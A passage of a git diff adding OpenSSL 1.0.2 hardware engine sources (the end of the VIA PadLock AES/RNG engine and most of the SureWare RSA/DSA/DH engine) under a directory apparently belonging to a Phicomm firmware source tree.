+        chunk &= ~(AES_BLOCK_SIZE - 1);
+        if (chunk)
+            goto cfb_shortcut;
+        else
+            goto cfb_skiploop;
+        do {
+            if (iv != cdata->iv)
+                memcpy(cdata->iv, iv, AES_BLOCK_SIZE);
+            chunk = PADLOCK_CHUNK;
+ cfb_shortcut:                 /* optimize for small input */
+            if (inp_misaligned)
+                inp = padlock_memcpy(out, in_arg, chunk);
+            else
+                inp = in_arg;
+            in_arg += chunk;
+
+            iv = padlock_xcrypt_cfb(chunk / AES_BLOCK_SIZE, cdata, out, inp);
+
+            if (out_misaligned)
+                out_arg = padlock_memcpy(out_arg, out, chunk) + chunk;
+            else
+                out = out_arg += chunk;
+
+            nbytes -= chunk;
+        } while (nbytes >= AES_BLOCK_SIZE);
+
+ cfb_skiploop:
+        if (nbytes) {
+            unsigned char *ivp = cdata->iv;
+
+            if (iv != ivp) {
+                memcpy(ivp, iv, AES_BLOCK_SIZE);
+                iv = ivp;
+            }
+            ctx->num = nbytes;
+            if (cdata->cword.b.encdec) {
+                cdata->cword.b.encdec = 0;
+                padlock_reload_key();
+                padlock_xcrypt_ecb(1, cdata, ivp, ivp);
+                cdata->cword.b.encdec = 1;
+                padlock_reload_key();
+                while (nbytes) {
+                    unsigned char c = *(in_arg++);
+                    *(out_arg++) = c ^ *ivp;
+                    *(ivp++) = c, nbytes--;
+                }
+            } else {
+                padlock_reload_key();
+                padlock_xcrypt_ecb(1, cdata, ivp, ivp);
+                padlock_reload_key();
+                while (nbytes) {
+                    *ivp = *(out_arg++) = *(in_arg++) ^ *ivp;
+                    ivp++, nbytes--;
+                }
+            }
+        }
+
+        memcpy(ctx->iv, iv, AES_BLOCK_SIZE);
+        break;
+
+    case EVP_CIPH_OFB_MODE:
+        memcpy(cdata->iv, ctx->iv, AES_BLOCK_SIZE);
+        chunk &= ~(AES_BLOCK_SIZE - 1);
+        if (chunk)
+            do {
+                if (inp_misaligned)
+                    inp = padlock_memcpy(out, in_arg, chunk);
+                else
+                    inp = in_arg;
+                in_arg += chunk;
+
+                padlock_xcrypt_ofb(chunk / AES_BLOCK_SIZE, cdata, out, inp);
+
+                if (out_misaligned)
+                    out_arg = padlock_memcpy(out_arg, out, chunk) + chunk;
+                else
+                    out = out_arg += chunk;
+
+                nbytes -= chunk;
+                chunk = PADLOCK_CHUNK;
+            } while (nbytes >= AES_BLOCK_SIZE);
+
+        if (nbytes) {
+            unsigned char *ivp = cdata->iv;
+
+            ctx->num = nbytes;
+            padlock_reload_key(); /* empirically found */
+            padlock_xcrypt_ecb(1, cdata, ivp, ivp);
+            padlock_reload_key(); /* empirically found */
+            while (nbytes) {
+                *(out_arg++) = *(in_arg++) ^ *ivp;
+                ivp++, nbytes--;
+            }
+        }
+
+        memcpy(ctx->iv, cdata->iv, AES_BLOCK_SIZE);
+        break;
+
+    default:
+        return 0;
+    }
+
+    /* Clean the realign buffer if it was used */
+    if (out_misaligned) {
+        volatile unsigned long *p = (void *)out;
+        size_t n = allocated / sizeof(*p);
+        while (n--)
+            *p++ = 0;
+    }
+
+    memset(cdata->iv, 0, AES_BLOCK_SIZE);
+
+    return 1;
+}
+
+#   endif                       /* OPENSSL_NO_AES */
+
+/* ===== Random Number Generator ===== */
+/*
+ * This code is not engaged. The reason is that it does not comply
+ * with recommendations for VIA RNG usage for secure applications
+ * (posted at http://www.via.com.tw/en/viac3/c3.jsp) nor does it
+ * provide meaningful error control...
+ */
+/*
+ * Wrapper that provides an interface between the API and the raw PadLock
+ * RNG
+ */
+static int padlock_rand_bytes(unsigned char *output, int count)
+{
+    unsigned int eax, buf;
+
+    while (count >= 8) {
+        eax = padlock_xstore(output, 0);
+        if (!(eax & (1 << 6)))
+            return 0;           /* RNG disabled */
+        /* this ---vv--- covers DC bias, Raw Bits and String Filter */
+        if (eax & (0x1F << 10))
+            return 0;
+        if ((eax & 0x1F) == 0)
+            continue;           /* no data, retry... */
+        if ((eax & 0x1F) != 8)
+            return 0;           /* fatal failure...  */
+        output += 8;
+        count -= 8;
+    }
+    while (count > 0) {
+        eax = padlock_xstore(&buf, 3);
+        if (!(eax & (1 << 6)))
+            return 0;           /* RNG disabled */
+        /* this ---vv--- covers DC bias, Raw Bits and String Filter */
+        if (eax & (0x1F << 10))
+            return 0;
+        if ((eax & 0x1F) == 0)
+            continue;           /* no data, retry... */
+        if ((eax & 0x1F) != 1)
+            return 0;           /* fatal failure...  */
+        *output++ = (unsigned char)buf;
+        count--;
+    }
+    *(volatile unsigned int *)&buf = 0;
+
+    return 1;
+}
+
+/* Dummy but necessary function */
+static int padlock_rand_status(void)
+{
+    return 1;
+}
+
+/* Prepare structure for registration */
+static RAND_METHOD padlock_rand = {
+    NULL,                       /* seed */
+    padlock_rand_bytes,         /* bytes */
+    NULL,                       /* cleanup */
+    NULL,                       /* add */
+    padlock_rand_bytes,         /* pseudorand */
+    padlock_rand_status,        /* rand status */
+};
+
+#  else                         /* !COMPILE_HW_PADLOCK */
+#   ifndef OPENSSL_NO_DYNAMIC_ENGINE
+OPENSSL_EXPORT
+    int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns);
+OPENSSL_EXPORT
+    int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns)
+{
+    return 0;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+#   endif
+#  endif                        /* COMPILE_HW_PADLOCK */
+# endif                         /* !OPENSSL_NO_HW_PADLOCK */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_padlock.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_padlock.ec
new file mode 100644
index 0000000..5c8a1d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_padlock.ec
@@ -0,0 +1 @@
+L PADLOCK	e_padlock_err.h			e_padlock_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware.c
new file mode 100644
index 0000000..1005dfc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware.c
@@ -0,0 +1,1096 @@
+/*-
+*  Written by Corinne Dive-Reclus(cdive@baltimore.com)
+*
+*
+* Redistribution and use in source and binary forms, with or without
+* modification, are permitted provided that the following conditions
+* are met:
+*
+* 1. Redistributions of source code must retain the above copyright
+*    notice, this list of conditions and the following disclaimer.
+*
+* 2. Redistributions in binary form must reproduce the above copyright
+*    notice, this list of conditions and the following disclaimer in
+*    the documentation and/or other materials provided with the
+*    distribution.
+*
+* 3. All advertising materials mentioning features or use of this
+*    software must display the following acknowledgment:
+*    "This product includes software developed by the OpenSSL Project
+*    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+*
+* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+*    endorse or promote products derived from this software without
+*    prior written permission. For written permission, please contact
+*    licensing@OpenSSL.org.
+*
+* 5. Products derived from this software may not be called "OpenSSL"
+*    nor may "OpenSSL" appear in their names without prior written
+*    permission of the OpenSSL Project.
+*
+* 6. Redistributions of any form whatsoever must retain the following
+*    acknowledgment:
+*    "This product includes software developed by the OpenSSL Project
+*    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+*
+* Written by Corinne Dive-Reclus(cdive@baltimore.com)
+*
+* Copyright@2001 Baltimore Technologies Ltd.
+* All right Reserved.
+*                                                                                      *
+*        THIS FILE IS PROVIDED BY BALTIMORE TECHNOLOGIES ``AS IS'' AND                 *
+*        ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE         *
+*        IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE    *
+*        ARE DISCLAIMED.  IN NO EVENT SHALL BALTIMORE TECHNOLOGIES BE LIABLE           *
+*        FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL    *
+*        DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS       *
+*        OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)         *
+*        HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT    *
+*        LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY     *
+*        OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF        *
+*        SUCH DAMAGE.                                                                  *
+====================================================================*/
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/pem.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_SUREWARE
+
+#  ifdef FLAT_INC
+#   include "sureware.h"
+#  else
+#   include "vendor_defns/sureware.h"
+#  endif
+
+#  define SUREWARE_LIB_NAME "sureware engine"
+#  include "e_sureware_err.c"
+
+static int surewarehk_ctrl(ENGINE *e, int cmd, long i, void *p,
+                           void (*f) (void));
+static int surewarehk_destroy(ENGINE *e);
+static int surewarehk_init(ENGINE *e);
+static int surewarehk_finish(ENGINE *e);
+static int surewarehk_modexp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx);
+
+/* RSA stuff */
+#  ifndef OPENSSL_NO_RSA
+static int surewarehk_rsa_priv_dec(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding);
+static int surewarehk_rsa_sign(int flen, const unsigned char *from,
+                               unsigned char *to, RSA *rsa, int padding);
+#  endif
+
+/* RAND stuff */
+static int surewarehk_rand_bytes(unsigned char *buf, int num);
+static void surewarehk_rand_seed(const void *buf, int num);
+static void surewarehk_rand_add(const void *buf, int num, double entropy);
+
+/* KM stuff */
+static EVP_PKEY *surewarehk_load_privkey(ENGINE *e, const char *key_id,
+                                         UI_METHOD *ui_method,
+                                         void *callback_data);
+static EVP_PKEY *surewarehk_load_pubkey(ENGINE *e, const char *key_id,
+                                        UI_METHOD *ui_method,
+                                        void *callback_data);
+static void surewarehk_ex_free(void *obj, void *item, CRYPTO_EX_DATA *ad,
+                               int idx, long argl, void *argp);
+#  if 0
+static void surewarehk_dh_ex_free(void *obj, void *item, CRYPTO_EX_DATA *ad,
+                                  int idx, long argl, void *argp);
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int surewarehk_mod_exp_mont(BIGNUM *r, const BIGNUM *a,
+                                   const BIGNUM *p, const BIGNUM *m,
+                                   BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return surewarehk_modexp(r, a, p, m, ctx);
+}
+
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD surewarehk_rsa = {
+    "SureWare RSA method",
+    NULL,                       /* pub_enc */
+    NULL,                       /* pub_dec */
+    surewarehk_rsa_sign,        /* our rsa_sign is OpenSSL priv_enc */
+    surewarehk_rsa_priv_dec,    /* priv_dec */
+    NULL,                       /* mod_exp */
+    surewarehk_mod_exp_mont,    /* mod_exp_mongomery */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* RSA flag */
+    NULL,
+    NULL,                       /* OpenSSL sign */
+    NULL,                       /* OpenSSL verify */
+    NULL                        /* keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int surewarehk_modexp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                                const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                                BN_MONT_CTX *m_ctx)
+{
+    return surewarehk_modexp(r, a, p, m, ctx);
+}
+
+static DH_METHOD surewarehk_dh = {
+    "SureWare DH method",
+    NULL,                       /* gen_key */
+    NULL,                       /* agree, */
+    surewarehk_modexp_dh,       /* dh mod exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,
+    NULL
+};
+#  endif
+
+static RAND_METHOD surewarehk_rand = {
+    /* "SureWare RAND method", */
+    surewarehk_rand_seed,
+    surewarehk_rand_bytes,
+    NULL,                       /* cleanup */
+    surewarehk_rand_add,
+    surewarehk_rand_bytes,
+    NULL,                       /* rand_status */
+};
+
+#  ifndef OPENSSL_NO_DSA
+/* DSA stuff */
+static DSA_SIG *surewarehk_dsa_do_sign(const unsigned char *dgst, int dlen,
+                                       DSA *dsa);
+static int surewarehk_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                                  BIGNUM *p1, BIGNUM *a2, BIGNUM *p2,
+                                  BIGNUM *m, BN_CTX *ctx,
+                                  BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int to_return = 0;
+    BN_init(&t);
+    /* let rr = a1 ^ p1 mod m */
+    if (!surewarehk_modexp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!surewarehk_modexp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    to_return = 1;
+ end:
+    BN_free(&t);
+    return to_return;
+}
+
+static DSA_METHOD surewarehk_dsa = {
+    "SureWare DSA method",
+    surewarehk_dsa_do_sign,
+    NULL,                       /* sign setup */
+    NULL,                       /* verify, */
+    surewarehk_dsa_mod_exp,     /* mod exp */
+    NULL,                       /* bn mod exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+static const char *engine_sureware_id = "sureware";
+static const char *engine_sureware_name = "SureWare hardware engine support";
+
+/* Now, to our own code */
+
+/*
+ * As this is only ever called once, there's no need for locking (indeed -
+ * the lock will already be held by our caller!!!)
+ */
+static int bind_sureware(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    const DSA_METHOD *meth2;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth3;
+#  endif
+
+    if (!ENGINE_set_id(e, engine_sureware_id) ||
+        !ENGINE_set_name(e, engine_sureware_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &surewarehk_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &surewarehk_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &surewarehk_dh) ||
+#  endif
+        !ENGINE_set_RAND(e, &surewarehk_rand) ||
+        !ENGINE_set_destroy_function(e, surewarehk_destroy) ||
+        !ENGINE_set_init_function(e, surewarehk_init) ||
+        !ENGINE_set_finish_function(e, surewarehk_finish) ||
+        !ENGINE_set_ctrl_function(e, surewarehk_ctrl) ||
+        !ENGINE_set_load_privkey_function(e, surewarehk_load_privkey) ||
+        !ENGINE_set_load_pubkey_function(e, surewarehk_load_pubkey))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * cswift-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    if (meth1) {
+        surewarehk_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+        surewarehk_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    }
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    /*
+     * Use the DSA_OpenSSL() method and just hook the mod_exp-ish bits.
+     */
+    meth2 = DSA_OpenSSL();
+    if (meth2) {
+        surewarehk_dsa.dsa_do_verify = meth2->dsa_do_verify;
+    }
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth3 = DH_OpenSSL();
+    if (meth3) {
+        surewarehk_dh.generate_key = meth3->generate_key;
+        surewarehk_dh.compute_key = meth3->compute_key;
+    }
+#  endif
+
+    /* Ensure the sureware error handling is set up */
+    ERR_load_SUREWARE_strings();
+    return 1;
+}
+
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_helper(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_sureware_id) != 0))
+        return 0;
+    if (!bind_sureware(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_helper)
+#  else
+static ENGINE *engine_sureware(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_sureware(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_sureware(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_sureware();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#  endif
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * SureWareHook library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+static DSO *surewarehk_dso = NULL;
+#  ifndef OPENSSL_NO_RSA
+/* Index for KM handle.  Not really used yet. */
+static int rsaHndidx = -1;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+/* Index for KM handle.  Not really used yet. */
+static int dsaHndidx = -1;
+#  endif
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+static SureWareHook_Init_t *p_surewarehk_Init = NULL;
+static SureWareHook_Finish_t *p_surewarehk_Finish = NULL;
+static SureWareHook_Rand_Bytes_t *p_surewarehk_Rand_Bytes = NULL;
+static SureWareHook_Rand_Seed_t *p_surewarehk_Rand_Seed = NULL;
+static SureWareHook_Load_Privkey_t *p_surewarehk_Load_Privkey = NULL;
+static SureWareHook_Info_Pubkey_t *p_surewarehk_Info_Pubkey = NULL;
+static SureWareHook_Load_Rsa_Pubkey_t *p_surewarehk_Load_Rsa_Pubkey = NULL;
+static SureWareHook_Load_Dsa_Pubkey_t *p_surewarehk_Load_Dsa_Pubkey = NULL;
+static SureWareHook_Free_t *p_surewarehk_Free = NULL;
+static SureWareHook_Rsa_Priv_Dec_t *p_surewarehk_Rsa_Priv_Dec = NULL;
+static SureWareHook_Rsa_Sign_t *p_surewarehk_Rsa_Sign = NULL;
+static SureWareHook_Dsa_Sign_t *p_surewarehk_Dsa_Sign = NULL;
+static SureWareHook_Mod_Exp_t *p_surewarehk_Mod_Exp = NULL;
+
+/* Used in the DSO operations. */
+static const char *surewarehk_LIBNAME = "SureWareHook";
+static const char *n_surewarehk_Init = "SureWareHook_Init";
+static const char *n_surewarehk_Finish = "SureWareHook_Finish";
+static const char *n_surewarehk_Rand_Bytes = "SureWareHook_Rand_Bytes";
+static const char *n_surewarehk_Rand_Seed = "SureWareHook_Rand_Seed";
+static const char *n_surewarehk_Load_Privkey = "SureWareHook_Load_Privkey";
+static const char *n_surewarehk_Info_Pubkey = "SureWareHook_Info_Pubkey";
+static const char *n_surewarehk_Load_Rsa_Pubkey =
+    "SureWareHook_Load_Rsa_Pubkey";
+static const char *n_surewarehk_Load_Dsa_Pubkey =
+    "SureWareHook_Load_Dsa_Pubkey";
+static const char *n_surewarehk_Free = "SureWareHook_Free";
+static const char *n_surewarehk_Rsa_Priv_Dec = "SureWareHook_Rsa_Priv_Dec";
+static const char *n_surewarehk_Rsa_Sign = "SureWareHook_Rsa_Sign";
+static const char *n_surewarehk_Dsa_Sign = "SureWareHook_Dsa_Sign";
+static const char *n_surewarehk_Mod_Exp = "SureWareHook_Mod_Exp";
+static BIO *logstream = NULL;
+
+/*
+ * SureWareHook library functions and mechanics - these are used by the
+ * higher-level functions further down. NB: As and where there's no error
+ * checking, take a look lower down where these functions are called, the
+ * checking and error handling is probably down there.
+ */
+static int threadsafe = 1;
+static int surewarehk_ctrl(ENGINE *e, int cmd, long i, void *p,
+                           void (*f) (void))
+{
+    int to_return = 1;
+
+    switch (cmd) {
+    case ENGINE_CTRL_SET_LOGSTREAM:
+        {
+            BIO *bio = (BIO *)p;
+            CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+            if (logstream) {
+                BIO_free(logstream);
+                logstream = NULL;
+            }
+            if (CRYPTO_add(&bio->references, 1, CRYPTO_LOCK_BIO) > 1)
+                logstream = bio;
+            else
+                SUREWAREerr(SUREWARE_F_SUREWAREHK_CTRL,
+                            SUREWARE_R_BIO_WAS_FREED);
+        }
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+        /*
+         * This will prevent the initialisation function from "installing"
+         * the mutex-handling callbacks, even if they are available from
+         * within the library (or were provided to the library from the
+         * calling application). This is to remove any baggage for
+         * applications not using multithreading.
+         */
+    case ENGINE_CTRL_CHIL_NO_LOCKING:
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+        threadsafe = 0;
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+        break;
+
+        /* The command isn't understood by this engine */
+    default:
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_CTRL,
+                    ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+        to_return = 0;
+        break;
+    }
+
+    return to_return;
+}
+
+/* Destructor (complements the "ENGINE_surewarehk()" constructor) */
+static int surewarehk_destroy(ENGINE *e)
+{
+    ERR_unload_SUREWARE_strings();
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int surewarehk_init(ENGINE *e)
+{
+    char msg[64] = "ENGINE_init";
+    SureWareHook_Init_t *p1 = NULL;
+    SureWareHook_Finish_t *p2 = NULL;
+    SureWareHook_Rand_Bytes_t *p3 = NULL;
+    SureWareHook_Rand_Seed_t *p4 = NULL;
+    SureWareHook_Load_Privkey_t *p5 = NULL;
+    SureWareHook_Load_Rsa_Pubkey_t *p6 = NULL;
+    SureWareHook_Free_t *p7 = NULL;
+    SureWareHook_Rsa_Priv_Dec_t *p8 = NULL;
+    SureWareHook_Rsa_Sign_t *p9 = NULL;
+    SureWareHook_Dsa_Sign_t *p12 = NULL;
+    SureWareHook_Info_Pubkey_t *p13 = NULL;
+    SureWareHook_Load_Dsa_Pubkey_t *p14 = NULL;
+    SureWareHook_Mod_Exp_t *p15 = NULL;
+
+    if (surewarehk_dso != NULL) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_INIT, ENGINE_R_ALREADY_LOADED);
+        goto err;
+    }
+    /* Attempt to load libsurewarehk.so/surewarehk.dll/whatever. */
+    surewarehk_dso = DSO_load(NULL, surewarehk_LIBNAME, NULL, 0);
+    if (surewarehk_dso == NULL) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_INIT, ENGINE_R_DSO_FAILURE);
+        goto err;
+    }
+    if (!
+        (p1 =
+         (SureWareHook_Init_t *) DSO_bind_func(surewarehk_dso,
+                                               n_surewarehk_Init))
+|| !(p2 =
+     (SureWareHook_Finish_t *) DSO_bind_func(surewarehk_dso,
+                                             n_surewarehk_Finish))
+|| !(p3 =
+     (SureWareHook_Rand_Bytes_t *) DSO_bind_func(surewarehk_dso,
+                                                 n_surewarehk_Rand_Bytes))
+|| !(p4 =
+     (SureWareHook_Rand_Seed_t *) DSO_bind_func(surewarehk_dso,
+                                                n_surewarehk_Rand_Seed))
+|| !(p5 =
+     (SureWareHook_Load_Privkey_t *) DSO_bind_func(surewarehk_dso,
+                                                   n_surewarehk_Load_Privkey))
+|| !(p6 =
+     (SureWareHook_Load_Rsa_Pubkey_t *) DSO_bind_func(surewarehk_dso,
+                                                      n_surewarehk_Load_Rsa_Pubkey))
+|| !(p7 =
+     (SureWareHook_Free_t *) DSO_bind_func(surewarehk_dso, n_surewarehk_Free))
+|| !(p8 =
+     (SureWareHook_Rsa_Priv_Dec_t *) DSO_bind_func(surewarehk_dso,
+                                                   n_surewarehk_Rsa_Priv_Dec))
+|| !(p9 =
+     (SureWareHook_Rsa_Sign_t *) DSO_bind_func(surewarehk_dso,
+                                               n_surewarehk_Rsa_Sign))
+|| !(p12 =
+     (SureWareHook_Dsa_Sign_t *) DSO_bind_func(surewarehk_dso,
+                                               n_surewarehk_Dsa_Sign))
+|| !(p13 =
+     (SureWareHook_Info_Pubkey_t *) DSO_bind_func(surewarehk_dso,
+                                                  n_surewarehk_Info_Pubkey))
+|| !(p14 =
+     (SureWareHook_Load_Dsa_Pubkey_t *) DSO_bind_func(surewarehk_dso,
+                                                      n_surewarehk_Load_Dsa_Pubkey))
+|| !(p15 =
+     (SureWareHook_Mod_Exp_t *) DSO_bind_func(surewarehk_dso,
+                                              n_surewarehk_Mod_Exp))) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_INIT, ENGINE_R_DSO_FAILURE);
+        goto err;
+    }
+    /* Copy the pointers */
+    p_surewarehk_Init = p1;
+    p_surewarehk_Finish = p2;
+    p_surewarehk_Rand_Bytes = p3;
+    p_surewarehk_Rand_Seed = p4;
+    p_surewarehk_Load_Privkey = p5;
+    p_surewarehk_Load_Rsa_Pubkey = p6;
+    p_surewarehk_Free = p7;
+    p_surewarehk_Rsa_Priv_Dec = p8;
+    p_surewarehk_Rsa_Sign = p9;
+    p_surewarehk_Dsa_Sign = p12;
+    p_surewarehk_Info_Pubkey = p13;
+    p_surewarehk_Load_Dsa_Pubkey = p14;
+    p_surewarehk_Mod_Exp = p15;
+    /* Contact the hardware and initialises it. */
+    if (p_surewarehk_Init(msg, threadsafe) == SUREWAREHOOK_ERROR_UNIT_FAILURE) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_INIT, SUREWARE_R_UNIT_FAILURE);
+        goto err;
+    }
+    if (p_surewarehk_Init(msg, threadsafe) == SUREWAREHOOK_ERROR_UNIT_FAILURE) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_INIT, SUREWARE_R_UNIT_FAILURE);
+        goto err;
+    }
+    /*
+     * try to load the default private key, if failed does not return a
+     * failure but wait for an explicit ENGINE_load_privakey
+     */
+    surewarehk_load_privkey(e, NULL, NULL, NULL);
+
+    /* Everything's fine. */
+#  ifndef OPENSSL_NO_RSA
+    if (rsaHndidx == -1)
+        rsaHndidx = RSA_get_ex_new_index(0,
+                                         "SureWareHook RSA key handle",
+                                         NULL, NULL, surewarehk_ex_free);
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    if (dsaHndidx == -1)
+        dsaHndidx = DSA_get_ex_new_index(0,
+                                         "SureWareHook DSA key handle",
+                                         NULL, NULL, surewarehk_ex_free);
+#  endif
+
+    return 1;
+ err:
+    if (surewarehk_dso)
+        DSO_free(surewarehk_dso);
+    surewarehk_dso = NULL;
+    p_surewarehk_Init = NULL;
+    p_surewarehk_Finish = NULL;
+    p_surewarehk_Rand_Bytes = NULL;
+    p_surewarehk_Rand_Seed = NULL;
+    p_surewarehk_Load_Privkey = NULL;
+    p_surewarehk_Load_Rsa_Pubkey = NULL;
+    p_surewarehk_Free = NULL;
+    p_surewarehk_Rsa_Priv_Dec = NULL;
+    p_surewarehk_Rsa_Sign = NULL;
+    p_surewarehk_Dsa_Sign = NULL;
+    p_surewarehk_Info_Pubkey = NULL;
+    p_surewarehk_Load_Dsa_Pubkey = NULL;
+    p_surewarehk_Mod_Exp = NULL;
+    return 0;
+}
+
+static int surewarehk_finish(ENGINE *e)
+{
+    int to_return = 1;
+    if (surewarehk_dso == NULL) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_FINISH, ENGINE_R_NOT_LOADED);
+        to_return = 0;
+        goto err;
+    }
+    p_surewarehk_Finish();
+    if (!DSO_free(surewarehk_dso)) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_FINISH, ENGINE_R_DSO_FAILURE);
+        to_return = 0;
+        goto err;
+    }
+ err:
+    if (logstream)
+        BIO_free(logstream);
+    surewarehk_dso = NULL;
+    p_surewarehk_Init = NULL;
+    p_surewarehk_Finish = NULL;
+    p_surewarehk_Rand_Bytes = NULL;
+    p_surewarehk_Rand_Seed = NULL;
+    p_surewarehk_Load_Privkey = NULL;
+    p_surewarehk_Load_Rsa_Pubkey = NULL;
+    p_surewarehk_Free = NULL;
+    p_surewarehk_Rsa_Priv_Dec = NULL;
+    p_surewarehk_Rsa_Sign = NULL;
+    p_surewarehk_Dsa_Sign = NULL;
+    p_surewarehk_Info_Pubkey = NULL;
+    p_surewarehk_Load_Dsa_Pubkey = NULL;
+    p_surewarehk_Mod_Exp = NULL;
+    return to_return;
+}
+
+static void surewarehk_error_handling(char *const msg, int func, int ret)
+{
+    switch (ret) {
+    case SUREWAREHOOK_ERROR_UNIT_FAILURE:
+        ENGINEerr(func, SUREWARE_R_UNIT_FAILURE);
+        break;
+    case SUREWAREHOOK_ERROR_FALLBACK:
+        ENGINEerr(func, SUREWARE_R_REQUEST_FALLBACK);
+        break;
+    case SUREWAREHOOK_ERROR_DATA_SIZE:
